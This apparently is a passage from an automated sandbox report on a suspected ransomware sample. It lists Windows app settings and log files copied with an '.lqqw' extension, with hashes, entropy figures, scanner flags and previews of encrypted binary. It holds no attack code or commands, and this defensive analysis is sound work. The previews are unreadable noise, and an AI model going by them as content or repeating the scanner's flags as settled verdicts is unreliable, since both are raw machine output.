                                                                                                                                                                                                    SHA-512:21E7DEDC7482B2C37E7BCC8D47F16050452E410116DB278C9A30C6CE561905A9D2C4D4896B553EA1775E4A3A93DD597BEF96DE3348A36C2D913A9E38C2E0BFB8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..=..0J?..\9...4m@..Y..4.....(.t,...Z..~^...W.<.O.|..0........A>.^w ........j.ft<f..+..Y...........A...L^..Dw..;0..t...d..,Fx....S..B..l.G....Q>JF....3..XN."F.c..C.<...s.....Z...TfgR'.-`.3....9S....U{8.._:~....O.~t...!-.G.T..0.*.A|]...\.n.O......$.....x!."....D^a2.&..a...<..k.m.#.T.f.Y..{.3e<..KN..9..'fh.....Ef..Z..<...]....T|..:.n..;.<;SJ.....k25Ec.f..K.".(....1b.y....>...o."...g...1d.v._....x........]B:..x.v.}.]..h..T.t..*-..c..].>Ix.N|O....r.......ff.bt.i........]..~c(..]X|..&...#..{..^#DK..&........R...... ..2.w..9>.y.......ua#kJB..lG)..)a.n..M.....W....._@.......Mn....&.....VCd..5P.~z1..Q-.o..9.@.f..H...I].....B.:.@...}....9j$..:..T..(.G.x...>..Z..$.v.).m%0VY...8@.......J.....S....1.....*.......W..7y]...F...l.U...0.........4...\.`.........-..J^z..6n#.......17.......R....K.....(..Y%..taq...Gs.p..$...E~.c...109a.5{|..`..El....Q....h. ..,s.Zm.4t/......oI..r(p.,..}..l..G.p.g#...].&I..U.z.C..l?..r.P.B.....V...g..L.t...a..9..........z
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976846774885829
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:OOj3DDbBZQCfrVlCtzOy5kbrrdtACxHmJkaU29AXf3Z0IYnO/S:Oi3DBRViOBdBhceXvCIIOq
                                                                                                                                                                                                    MD5:81001E11B66EEEB1E6EFE78B203407CC
                                                                                                                                                                                                    SHA1:42BB6B5C3F68DFF3970F8ACC4C15CF7D5FE316F5
                                                                                                                                                                                                    SHA-256:F6AD767671F75400F010C8B71E1967CF06FBA8C4EA4173B097299F2A23AC4FAB
                                                                                                                                                                                                    SHA-512:D418394240F14AB2EB6DEC80443AD2363BC29CB27EF396B7DBBB97877C4444845AF886FA5172F747B13295E0611011F88DFC7A3A3BD45B0E7CB1E55E4A39ADE4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....\.........}..e-......Bb....1..=...mIF]..?S...^n..UD.tJ.....=q.I...7......?.5!...M..o.2.>..*.[.S0..b5.q..*.....#x.....+~\x....>..V.4.O...Ag<.v.;Gi.S...&1.f....}Xc9......X.O.........a...?.......1W..($>..g.e...c....O..!y.Yr.!".p5.a.P..n.6^%..u..J.q+..[.&.U[>.xH.....].*5.xe.P9..`..H..K.............b.Q.1.k..6.b....^s{..4.z.7.....=..em.a4@L.u..'nq..<.....a......>].w..x.MxJ+.L.....r....F`..&.......>.....vA".x......(..*....A...<.[4e..+(....R.....<..B..I.B.\cy.\a....8....8x.-.%..C.).......9t.i?..V......>....1..T.c.=...IExL.40>[6.J.....0j.....x......m.R/"2..|..gL.:...S0.........*(.$...u.P....C.V.)hD-. .L....q.....<..p.v...G...v...}W......../.....iC...K....Bh..d.r._..I..J.FI...dcL...m^b...s.w.m.....X.P^'..)..3]I......n<I.|...k..$..i..%..r...>....n.I.......w..2........uL.ay......3.z...zE....R.........onO'=P=p..7Q.^T...@.,8.F.mG%....c$.....wb..G..=Wo,. .2~.$.P./MK.2`.;A_k......1]...*'...."..>s...;I5.....((..l......i....q......Ug..V..i..je..I
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981043486773375
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:yBLXMfjdm57WCavLug8pU1Tbl8asHhAT6QvjECl0:WLXxZWCaG1aEATE40
                                                                                                                                                                                                    MD5:23C91631BD6952756521177ADDA096DA
                                                                                                                                                                                                    SHA1:A2EBFE8D6A4C39C30BC2CAAC8A275D7C23B66736
                                                                                                                                                                                                    SHA-256:FE2754D336394765E7B1355B9495D63FE8CEAACF40CB3B214B2F994D94AD5064
                                                                                                                                                                                                    SHA-512:CB3B19D889C0D4BEE2F067C62F5BDACB61683B4B0A44BDCCDE2DE173CC02CEE7F47EC8499EDF2D1FB5399D711AE9A9E0B06242CB523E2F03054C7B764FC543D4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....G..mE.......P..IE.QC..|^.....=`#..a....[..5..`?$...K.e..U.....4..U.{4MWq..j...vd4.....et{.."e.F.?..(....s./..[..>@..>s.s..G.[s....W46...4.*....kM|.4.\*$.=]..5.8=...rx...2.7.^.U.RzR.GTf..K....y.....)..R.."n...j<...'...T.1....l.~:......"...~c.z:.X...*H.j..F.P....O....+..b....;....&..n...w.......c........(UN.V..O.:. .h.........k.."...$...}..Fx....<.\......*.=..eB.Q.......A.....q.v.wZ...J...pC...R.E!..OJC..55.q#J...-..J`>7b......@...!..).. ..n]...J.......p...........@._\..v.H.....b:O.`2r..t[7......J.\...h.B.{..=...Y.........br.O....`r.!...........U.N.j....X.y.8..."....G.y..7p.....wK.a,....$U.c.DW..J..m..!.c<.R..X...D..E......W...4.q..+...|o[....T.:y3JT.f.E.S...+./>.Gl.x,..t.c.:.o.;S...w.../.\A3.Y..........;.H..?.....C....d{Xq...l...n=..).#.)..........p........K...'x.B.!.N:..tg.dg.e.w.v..=.*...s."{.ocKF}v.......|..........v....../..LH...).u..r..k.>L...y.....N..L...;F!..p....(i...%.c.?;..P..3i.m.....:.|.=...vw...`UBJ3n......1?O..1@.r.a>l...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977969663944942
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:E/ez0cxdfMmiiDY4nNE0Co4B5ZbHBor9KmYUwq0I//TaX:itcxwvo4B/BohK40GGX
                                                                                                                                                                                                    MD5:DDF0F1A6562904CBD76896561C2B395F
                                                                                                                                                                                                    SHA1:7783D5A51242B7FBFB1884A749315E5A6862EBB3
                                                                                                                                                                                                    SHA-256:581557C4102BDBE644EE262E51E249AB452EDBF5C2801603CA300DE04F7D217E
                                                                                                                                                                                                    SHA-512:B9785049A00E8F34E6E653A165CB125E2991F2B8A8857C887D14E0180673B53C1E9AACEE7E193DC5762CDC1AAB22BE435D68C284E166D4067D38A2D3EB0F8408
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....j..Q..6.....P.(..a,[..t.o\.D..../...m....gu2.V..[H"......E....m....9...s.#x.....sd..O.)mfd.m.4 ...3......*../...k...D Sbc.4.............8.........9.0.~..X...a..u...f{k.$..@.B..X!....Ji.....?q..x...e...!.`b..`mN.....)$4...c....bg.{.F..z..M..$.%...(.tFoa.....h}..7..g.M.3.R.J..Z.U.oc...5..EWb-O~g....Y1S......`...T.i..9.>.Q.E....._..L.....q../``...n.=...m.T...D._.....qH......7P...)sf.p...Fz...(0...P...pR.......T.3lj<.D.~....*..l.@0...e....Wx..yVL.$7..iT...U..._B.q.s.kXD3K.K.]..W..........@..5....abL.k1..b.P......b+1^.pi4.w.W.....{O..0....HK.S.<.4D.k..mw:.W.{h.=H.Ei...-(.\kJ=E..Z1....J.t........xsO..18..~. ._Ub..9+..FB.@%v.../Kbj.UR.....}A`.? l?...5..g.s.p#w.E....<.s..h..,.fy.H*....5.6..~."..mU......OQF.[.Z...:v.r...i.P...L..1E.sH.9.....5.~.y./.7.H...^._...5&-[.fQ..^...v<..<.>..Kx....2.!.....r..T.w...f..2...kU(5.4..@...*..S./zLF?..u.....q.i..Z)...aN&:......*..%!.w`-..:'.TG.....q........^....j..!l}...1.y.....<CC':..o..f.F.B..m..-.^..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97818080602771
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:csPWGALn8Cl/ytRcGVaN009dOj7/DbP1/T+gaSPJyO+9NYeG3:ccJM8ntOu2r3Q/fP1/T+gwN/G3
                                                                                                                                                                                                    MD5:A589B04E43F87CF2C4E7C55352667893
                                                                                                                                                                                                    SHA1:6E8482BBF17D3A10117D7EF25A40FF70617C927F
                                                                                                                                                                                                    SHA-256:6FE8B7E0ACFF47F936A5D21D28A4E75DEC31461F6D7543DF5A9831CF7F059300
                                                                                                                                                                                                    SHA-512:A6C1D24DF5C6AAEFC58B8FE8F3704B43F88C5D3AB585D38E5B0E65D22CE46744F720B05B658316BBBEAA3A330DBF66067FB523CE5871316AE46872B468F6CCD7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .H.l.S".T&.....p3.l.!...............>.&b>...X..H3....S......UQ.lo\$..M.....a..&..[.L.@5....M.=p(.\...`.J..?>.;....2.bg..#....F .{..bu.....q.9.#n..n.<h..*N....[.o....qn~.2..3...U.S.....F.:.UO.......J`..<..w1...Y.(..dab......M..VX...sW.&*&.+.gp........7-..$6....RFV8J.b`.m"r.3.5..llxZS[.{s...c.9e..,b.....j...v.R\..kX... ...7.......]..^.0..Y.."#..@.8h...W.......b/DZgi%.....3-.k..J..C.V9.O...]....;(..4.t..3?E..".P...9.L....'..'..=.aK.C.W......X......pB..oIE.O.HB...X....<.4Ut.o..r..!...h{..L6..........m.....Y..C.b0.F...Q....R..AJ|!Wx..5Z..r.;..e.@.`..J,.,.X.d...............M../..Z......[~..*.V../.........y...>_g.M...W+9RLo..,.~..(...~W..><..T....q...S(H....'.^..... d....(X.'........L..J..Zl........9..'.}......V.<.%....-......x....3Hi...{^....Agt,?....bnM....f@k..o.....O.....5B..6..r.e..k,.@8...)QW....k..<..M..f..i.tb=........^.RG!.TxV...k..t.{"..f.si. .S....%u......g.2...5./....!..ab..4.i.b...'<.!.X.;I...0D...W.;s.h....^....J..e........{
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976762705617206
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:sbbJKXRYcpaRUwNzDMFYlwXDQRlin8UONF1sW1TyvV/z:sbbsScpaqwZDMFYlwkb7f1dmr
                                                                                                                                                                                                    MD5:55DA9FD3EC2652574EA44190E30618C5
                                                                                                                                                                                                    SHA1:0F0D8ED3F5780733213FD54B4B5451F67E798D3A
                                                                                                                                                                                                    SHA-256:A4959B581B3DC131507FBE67B3A1A1C140D5E871AA1EAC328A6B2464918184E9
                                                                                                                                                                                                    SHA-512:02C6C02D62DA3A40E517FEF68FCD096BB53416AFC82AB1EF7DE9EA48F724B2F5869E236B9835CB6CCDAE765591007D42FA469382A923108909E7EA68763CAD68
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 0.d..\.K...C..<...x..D......m.>.v-.....).3......H.0....QB.[>:]{.jl.\.N.v{.V.=..G8L.y.JJ..K...c.....-j..'+.M.,.".-...S.=..R$....(.....T.P.@...s.....[..^C..7H.l......91.C..Yv.........H.....<.+0.H.l2...........X.ZO...8.`.bu..)..J.....'Sy.N.n...Td.vGY.k...I..c..........#me..w\.X..(2..H.l>.....p.U+...[x..>......z..,sT].=]."cj........O...... %..D...vE.,..s.D..=!..&....rj.})..bt(.!.Zu.<y...7B=A.L..g..g...H...~.;.pvcN.8X..IuA......k?.`..."...s..#P......&..u......yA...._.).3.pQ..(...A.(_.$.N..Z.<......IO.A:...*g@......Z.S.v....K..Y.{..>.../.....HEz..>.i...9...>....Y7MmuQ.D.....*...X..Y.q..^.&$...DNv*....P.i:_P3..Xq....[wt....6...\hj...........IP)..xd....w.d'!.@.=..K...&f.N.....B{....[S...L......[..6o..f...C.6.....".I.E.#........?v...'lP-..o."*......K.yw:.....QI<..../.J......{....>.Q....Q.mk.6..$.v.w,..(.Sg.l%k._3<...;..e.S.....2w/$.2..E9.......d.h3=B/..{.....G...A.k.&8O............3......5....;....".....e{...r..:%0.D.....),-...!.v...63........jtv>n.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24905
                                                                                                                                                                                                    Entropy (8bit):7.992813509648109
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:a/auCj2vshi2fQ9tLKimWZCCG/VmxrNgH:4auCjCUbOxCOs
                                                                                                                                                                                                    MD5:38CE9D1E86BBA89CCDDAE4B444AAE6FB
                                                                                                                                                                                                    SHA1:F19BFE5687EAF706D77449BCAD5066A0F94E2F1E
                                                                                                                                                                                                    SHA-256:A397336227236722E427CCDD9BA6EF1E32DC42AACE4EC99320E275DB02AABE48
                                                                                                                                                                                                    SHA-512:FBC1A3DE40BAFA7D6FD551A6EFBD835E3ABE0592256BCED72BE89C69D38674819B50BEF7E2E9AA86DE6393955968A5636AFA996D181585AE2E92B85519420C40
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..C......NZW4g...$F...US.4..B>...&............H0d.nk...kz.U....,"..Z.P.......ke.6.#[V.|N..g...vHr..)..5o..QG...xw...kJ..(.z...r5.4....q.........Us*Z.....~..f.DK.%2b.6x.L-....?W.g.MW..^.>.V.1)...+.Z...hT:#-..#,..~....R..7..d...X....KV9...@.4..P..TH.b.l.......,.Y....i._./..5....F.g.'....H.!Z.~b.#..p...1./_..Y...: .....?...u..J..?.mT'?./C.._-.\./X...7+tnk.C.e..X...Q.^....."iG......r...2-.......9#.e...i.b.O..e.h0....J.3.Q!.....B.....Zc:.YU..Cg-v..9..#.....@...-.m$...k..5..:.i..5.Ln.....ss... ./..,..GE..38...N...c./.%./+....Q@Y}..8+?.c"..i....x]...HJ...<...UUM..s....g....,.&_=.$....<E..J'b.......R.${j.6^c........e./.I.[....a.........)+..K..h3#x.z"..f..UE...,..V....).K. ..h@.$...0..W~!.Q.q.o..WMR^v .$.L.. x.|........{..&....."93.|...9....x....</UY..<.d..n0..YG.Jz..^.TWI.z7..U|$...._.l..0.e..mw.$.Y...AH:S..n.6..N....8..w..};]nl>..8..*...`.... .w.@e.I^m..~ .$.........Q...n't.w..=_.b.{...#].u.........l.9..l....!.z..TyW..B.e.j.@(L.~.N^.....3..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975850556952944
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:lBfgQwlTXOf27Pvl/yY9fQsCxV7bdJHOqd+LvC+FXyzMEL6NGqS:fYQwlDOs3l/yeYsCP7P+Lq+FXyoEL6Q
                                                                                                                                                                                                    MD5:F850531E305D1106570808497A9C88BE
                                                                                                                                                                                                    SHA1:5C77922F7C43C920A5695DF196B43E18ACC0881A
                                                                                                                                                                                                    SHA-256:3C38A448AFABCFC55BB9186BF63DDE97B756C7B0D1B326DD02688FCFE97E0407
                                                                                                                                                                                                    SHA-512:107F0EB6188D6581185E496165EE68E4A3DD108D8883D50CD7B2391E9D27ACC63AD0FA8AEE3F597CD8019AA64113BE48AB57F3A896F9D554C8B40492ACE4B51B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...CF..._._W..P.e?.r...g,p...zp#..G.nv....8....+..!^.U.xz...r.#..*.I.8.Z1_.w..}.........o.>*e..Q.Z/E.S..E(.#...7cOsG%1.;k..z>.%.L&..q.WGF_..Z.....-kpG.....V......`..Q...-HV..W.=.."a...B......3&..7.0..X.O.".Y.VX.....!......@.......i..S`.... ...W.I>..3H...-.mz....4.f..."t.;..N..#...J.s....>...<Y..;.Q.."....-..d[}g...o....#..([..?../O.m....EF.H.W9b.b..:M=..#...........T.G.!.@..-#.........r.:.g.l..0.|.H+u......]....q.'.(S".z=.u..:8.a.B$bb....{..<xc#..1.X_Y....*...:.}./+FS=.......{WbR.f\..N.-..\N.r.s&..-.l|..QN.b.)g..b..1.>j..[..;..$.".3.n.L..kqk.Xb.O..'$.$_...gW..ay...?...."4..).1....:7...P.3.......%._.C.,..Q0a...f..e..t...|.py.^.6Y ...^kp?.)..WM..%x<h..n<&..Y.?#....|[.k....NT.}.b...t'..3lX.IZ.......J..+.,.mdwJ..6...o+../..)-h.<....D.....). .:....9....3:(l{s.X(R_E0.jtb>BG.e?..B.... ..E..g...7MN.q_GZ..T%.Y.......Y..f._.O<.v(mW..2.5We^K.X..0.Esk..9.-.P..=.....kdB.......6..h6..o{..@.].r.{&(+'..w8Y.....6.\...,...M...K..a.........1.L!.....D......0.....G
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976699051578017
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:vuf1wMdGj71XF4UYBtpmF4oW5ss+Bdw32mvO:vuflGlXaUWoW6sQdO2mvO
                                                                                                                                                                                                    MD5:30A240D6D02B2D54CC8EDAC1E7FB9C9A
                                                                                                                                                                                                    SHA1:7DED9D86827AC39F62247D5DA6BF3E233DF54D27
                                                                                                                                                                                                    SHA-256:189D9A59461B8139948EF14B4A71D499452B5F9B5E3FF549D173817E1AD77C34
                                                                                                                                                                                                    SHA-512:EDE0FC2CAC8A96E70980993D7FFA90F53874549C826F946D90621976B1C09E6C0A2905FD8669A961C437A62109245ADE932396FDA2A683041483331853D8441E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^.i[.;..Z...>;.1u.......[.z....3T.Z..._..?} ..F...r...FA.S.n.}fB....WP.14.*..{.>....P....@.N.......U..M.:L..%q..S...q0f.....G.V.T!......J0.dy2:.......O.A^|VY.]..&9w.t....~C..e.k.6.. .._8..........1.Q.......\+.ln.B"6bR.r..<?FZ;."....-.#.Po.....P.l.g..Nf..'.RX..#.>r'..X..G.Q.lE.ZM.P7.'..y*n\...........Y"O..j.ob.K..f[...q.....i.......^..u.w...(|(i....(,.|^...H.e...p..4......p.....[/...7.;....R......2T6.].S....&Z......o. #...F.W+.xh.......wv..+:...Gn.5......u......(.Um...9l+....e..L..\....}.....U.v....sJ.t..G'....:.B(..J#..x..0eRP..9r.<.B...9U\.l.QE..&..,..:P\.p..E5....>#2_<.w;..Kv..-..G..&j{\cTX..q6......wi...ie.....<.4E...V."G...?.........hz.Tm.T.,..Z)..\....Fv.3]...[...O..#y....S.SVt@.me...&Q.......T.e.&.5.'....M.^.T.....J.C.2..T=.x.H....+.s.....~oJ<?u.>.\3..h........\6........[.[.x..m.*.\8.vuy.kt.XSh.>.&]....}.ng.EE...p.....a.l..sG<T....S.z....y.....B..m..3....-.}2t.D...Y|..........6.. ..<-<z..R.O..?..rd..L..$.0..cqY....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979063847118713
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:qvzk0ghqSiAmvLdKkCnHhkTUX4EFO0fPqlBStCbi8z3X:qbBR/VdTNk4bT3X
                                                                                                                                                                                                    MD5:E69A8DB50037B846E3F2FCD5AFFE455C
                                                                                                                                                                                                    SHA1:910A228E33531A1CAE9971C94AF435E948B22AA0
                                                                                                                                                                                                    SHA-256:4DA11280EA1E20067AD08B10E5D99481FF226A205024CBB5EFC7EE5711BF4E6C
                                                                                                                                                                                                    SHA-512:E15D4CB88855B474BC94036511E0D8E1A0CB881684510F824880CFC7402AD6FE814EBBCFCE83A0D028F391866DC59A3B1F981A2DA0A6E14BDE3FEE654DC6026C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |..Ro..I.'.*S..........Jk..ED.]........!...!...nl..h..6}Q{.H..*N.l._.qx8|z.+.....Oq.;.sm.B.]yn...O.5&.\i.@6.....M....C2.~.?....QJ...p...T.d!...O.N.Sp.]G....^.7..D:..Y.l..g....... ..>qA..v}.....d.........r..f......$..U.1.,...lU?b..g'.E....*7.0.1.........'.2|.+..AT-..R?..<_..8.0..;x<.W..Z....L...m042t.{c.#...m.C...!.?KX...?.>.<\....vc.Z.....8.....qk....>...}?....W.89.+.#.~..Cp.3......z....6....P.4FF....k........3(..hnJ.L...>{.KiY.8.i.....cT/M..hO"...f..'..8..C....i.......%xL....z...E.FP...`~....d.4.....A.b....b...[h..e.*.......co.>.#..s...s..V8.s......@x.b.5./.T...!U>>............:..:.&i..V.p...L...!R...W..v...;.b.,.d..b.......V.zX.k..%.6........l...._.W.:......%..(8...F.p..q....;{.<W...<T.w..g.=..@._J.t.Z..<..,./.>U.2.a}.........%S.v..L...^W.. ..$.4...H.Y.. d.......t~.H.c#.G .t..../.....7nR....#.d.......?.'...KeQ.f(=:.D..7(..7u.J.b..e"x.....<.3o....yD.k&bDE.+.%{.zNL.\..[..P.d..............k.t ..B^.+../a..2W)=....Q..*..Z.D."..c.0A$....C..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981599067606577
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:LyaEKKcx66BsNm2guzHMAyQVNx29amqAzNQm4mrP:1u4sc0zHEQU92ABzP
                                                                                                                                                                                                    MD5:874663606712611B13651B70B4093BA5
                                                                                                                                                                                                    SHA1:DFBF4FECA2E514DDF95136E2365CC30147F2390E
                                                                                                                                                                                                    SHA-256:93E99886CB8050DF71318C4CCC57DAC3934F93438FC35A0AEE7334D07F03E56A
                                                                                                                                                                                                    SHA-512:1518608677DDA7D51B30DCFEA2F8CB73EB5F7A71A2E12DA1AD77E89153F22AD92E0F4928FAB3BB2A08E6112D7CF83A3F375FF73569AFB0A3FE9E6445D09B3381
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..h<B....|ZeW.....8:..F.."1oz.|..B.e.F.\Y.C5.C...J...<.......Ta7h"K~X.@i.gI.8.^....:.A'a0.U.(...n.e..JF..S..]G......K.....)....Pc=.z}.J..|4.....Ov..w..ib].(...G................L.^...V......g....8e.....k+..*...n.Z......v..^z....V.....".H}q...N.k.C..oT..k.."...L....7[=..1......Q.....? I(|.....KPI7..dnis.U......rX'r.~n..nt.^...}.:.........=.M.,...k...x3.>.g.?...m.J%..9C.m.3..o...>`8.&VQ...e....g5.........`..S...e.Y..."...u.V.J....*..E........I.........O[....@vY..`>q...)..[..'xa.HJ..d.....U{)...E..Q.[.......{.....,...2U...k..3....T/..*......5;'.1......1.MRv..i}.v\.`....x^]..*...a$.|..<..f..9.. A../..uj...e.s.PY.B.3.....S..D..y.....Nr...N..........U.. .&...K@..(.6#....7.9..%.F.c....u.j.........Y.....[V...9.-.yox...Z...{.F_...n.@@......t...\.)......j.u.|.a'..{..++..<.sv....dOM.W..q^..Y..S.._.f.s.....(d..B...K..8.X..vdnZ.g....}.m...o...t..(.&w..a&...a.%?f B?..#gTQ..F..D....?.[x....B...nm.aDc:".Z.6H*|.]n/. .E{A.Fj.\..W.taC%,R'..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980023680816586
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:bA4Qu0BAMLXdQ0Ulk2OCzaAVzwb416YhEZpuCzDCqaXwjZLN:bUvlLXuZOCeAtwbU1EZpfiqaXQZ
                                                                                                                                                                                                    MD5:76509A2331F8616F8673F7C4A704D0E4
                                                                                                                                                                                                    SHA1:21B1905443425A163D9E862497BABBA3B4BBBD7D
                                                                                                                                                                                                    SHA-256:D61304986909076C4DB9D63C111718174D0B79A9D35EF2C420BCE2DC054FA615
                                                                                                                                                                                                    SHA-512:FD032A8EF7A641E2C3BFFEF6C7FEE7730528A74BE41E240D311D7147273817E84A1F484DB017134CFACFA20E9F4CC8ADA06C1F092E9604E397D4715B5941D872
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 3|..G..[....I8`.....(M.g.o...#G. ....'64..C.T...)V.T.G.s.......1....mB.......Q.....P.I..\..'+SWdx!..z.^N....=>Q..3*.....x...2........../...@.=..k<'.....G./2......1nFrq.....:..u.......#v.K...b...]yU....?...g.B.)....i}.P.8.{.!POq..T._8..(...Z.*.".\/NWS.|#.#:.8..}H.u.Ix8..h..q..I@a.'Y...F.9.).J...w...F..-.eJ*hm.!...(7........<gU......zj.r.q.;'..wVBZ..iJ.....{...o[..K...9.7.S/.......O.J.L.L...L[.....5.;.2..r.F.......s.....V..A.wW,A~...F...s...e$L......F[.O...y.).....P.(..ru.w.:..M2.(.Z/.......~7..4*.Sx..F...`.......).M...S'......!.-....3.k.).^E..1.n.._..JL6>S..=,hv...#f.~.........INy[&~t ....N._..../f;U.8~..wI.xJ............Zmg...Tl.....c..v..[.....~@|6..,.1.w.p..b.Fs..%k@......Y>..''...!p0q&a..`.G_O..|.^..f...8/cX..|..^.V....9...[.b.5..........:.....g...3~.']..uc.R}....fG.q.....B....VBnK..jt.|..W.. .X,..x......R..........vE.".J..gK.$A...m..O.....W[.u......g.........I.s..4..J5......$g...Y....tLN'|f'...9..t[..v........>..o'.%..".%...$..].F.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976895525142547
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:fwkFMbBVLuXBjkV4ipxYQaI7bpqcHYVUjLOfTWwTcz3BEs:fw/B4BkV4ipxFVLHWmOymcx5
